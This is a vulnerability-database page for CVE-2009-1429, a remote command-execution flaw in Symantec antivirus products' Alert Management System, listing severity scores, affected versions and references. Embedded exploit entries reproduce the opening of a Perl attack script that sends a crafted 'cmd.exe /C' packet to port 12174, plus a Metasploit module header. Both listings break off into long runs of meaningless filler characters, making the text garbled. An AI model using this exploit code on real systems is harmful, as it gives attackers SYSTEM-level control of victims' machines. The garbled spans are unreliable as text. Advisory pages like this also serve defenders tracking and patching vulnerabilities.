CVE-2009-1429 : Detail

CVE-2009-1429

Code Injection
A03-Injection
95.98%V3
Network
2009-04-29
13h00 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Intel LANDesk Common Base Agent (CBA) in Symantec Alert Management System 2 (AMS2), as used in Symantec System Center (SSS); Symantec AntiVirus Server; Symantec AntiVirus Central Quarantine Server; Symantec AntiVirus (SAV) Corporate Edition 9 before 9.0 MR7, 10.0 and 10.1 before 10.1 MR8, and 10.2 before 10.2 MR2; Symantec Client Security (SCS) 2 before 2.0 MR7 and 3 before 3.1 MR8; and Symantec Endpoint Protection (SEP) before 11.0 MR3, allows remote attackers to execute arbitrary commands via a crafted packet whose contents are interpreted as a command to be launched in a new process by the CreateProcessA function.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS V0
EPSS V1
EPSS V2
EPSS V3
100.00100.0096.0096.0092.0092.0088.0088.0084.0084.0080.0080.0081.54%81.54%97.21%97.2%97.16%97.08%97.05%97.08%97.03%97.1%97.09%97.06%95.98%Jul '22Jul '2220232023Jul '23Jul '2320242024Jul '24Jul '24
Download SVG
Download PNG
Download CSV

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
100.5100.5100.0100.099.599.599.099.099%100%100%100%100%100%100%100%100%100%100%100%100%100%100%Jul '22Jul '2220232023Jul '23Jul '2320242024Jul '24Jul '24
Download SVG
Download PNG
Download CSV

Exploit information

Exploit Database EDB-ID : 10340

Publication date : 2009-04-27 22h00 +00:00
Author : kingcope
EDB Verified : Yes

#The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote #command-execution vulnerability because the software fails to adequately sanitize user-supplied #input.
#Successfully exploiting this issue will allow an attacker to execute arbitrary commands with #SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will #result in a denial-of-service condition.
# # # # # # # # # # # # # # # # # # # # # # # # #
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT
### USE AT YOUR OWN RISK!
### by Kingcope in 2009
# # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
sub rce {
($target, $cmmd) = @_;
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '12174',
Proto => 'tcp') || goto lbl;
$magic = sprintf("%d", 0xc0d3b4b3);
$command = "cmd.exe /C $cmmd | exit $magic";
$cmd = "$command";
$req = "\x00\x00\x00\x00" . pack("v", length($cmd)+1) . $cmd . "\x00";
print $sock $req;
 
 
הההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההה
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Exploit Database EDB-ID : 17699

Publication date : 2011-08-18 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: ams_xfr.rb 13591 2011-08-19 18:35:29Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
 
 
הההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההה
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Products Mentioned

Configuraton 0

Symantec>>Antivirus >> Version To (including) 9.0

Symantec>>Antivirus >> Version To (including) 10.1

Symantec>>Antivirus >> Version To (including) 10.2

Symantec>>Antivirus >> Version -

Symantec>>Antivirus >> Version 10.0

    Symantec>>Antivirus >> Version 10.0.1

      Symantec>>Antivirus >> Version 10.0.1.1

        Symantec>>Antivirus >> Version 10.0.2

          Symantec>>Antivirus >> Version 10.0.2.1

            Symantec>>Antivirus >> Version 10.0.2.2

              Symantec>>Antivirus >> Version 10.0.3

                Symantec>>Antivirus >> Version 10.0.4

                  Symantec>>Antivirus >> Version 10.0.5

                    Symantec>>Antivirus >> Version 10.0.6

                      Symantec>>Antivirus >> Version 10.0.7

                        Symantec>>Antivirus >> Version 10.0.8

                          Symantec>>Antivirus >> Version 10.0.9

                            Symantec>>Antivirus_central_quarantine_server >> Version *

                            Symantec>>Client_security >> Version To (including) 3.1

                            Symantec>>Client_security >> Version 2.0

                            Symantec>>Client_security >> Version 3.0

                            Symantec>>Client_security >> Version 3.0.0.359

                            Symantec>>Client_security >> Version 3.0.1.1000

                            Symantec>>Client_security >> Version 3.0.1.1001

                            Symantec>>Client_security >> Version 3.0.1.1007

                            Symantec>>Client_security >> Version 3.0.1.1008

                            Symantec>>Client_security >> Version 3.0.1.1009

                              Symantec>>Client_security >> Version 3.0.2

                              Symantec>>Client_security >> Version 3.0.2.2000

                              Symantec>>Client_security >> Version 3.0.2.2001

                              Symantec>>Client_security >> Version 3.0.2.2002

                              Symantec>>Client_security >> Version 3.0.2.2010

                              Symantec>>Client_security >> Version 3.0.2.2011

                              Symantec>>Client_security >> Version 3.0.2.2020

                              Symantec>>Client_security >> Version 3.0.2.2021

                              Symantec>>Endpoint_protection >> Version To (including) 11.0

                              Symantec>>System_center >> Version *

                              References

                              http://www.vupen.com/english/advisories/2009/1204
                              Tags : vdb-entry, x_refsource_VUPEN
                              http://www.securitytracker.com/id?1022132
                              Tags : vdb-entry, x_refsource_SECTRACK
                              http://www.securitytracker.com/id?1022130
                              Tags : vdb-entry, x_refsource_SECTRACK
                              http://www.securityfocus.com/bid/34671
                              Tags : vdb-entry, x_refsource_BID
                              http://secunia.com/advisories/34856
                              Tags : third-party-advisory, x_refsource_SECUNIA
                              http://osvdb.org/54157
                              Tags : vdb-entry, x_refsource_OSVDB
                              http://www.securitytracker.com/id?1022131
                              Tags : vdb-entry, x_refsource_SECTRACK
                              http://securityreason.com/securityalert/8346
                              Tags : third-party-advisory, x_refsource_SREASON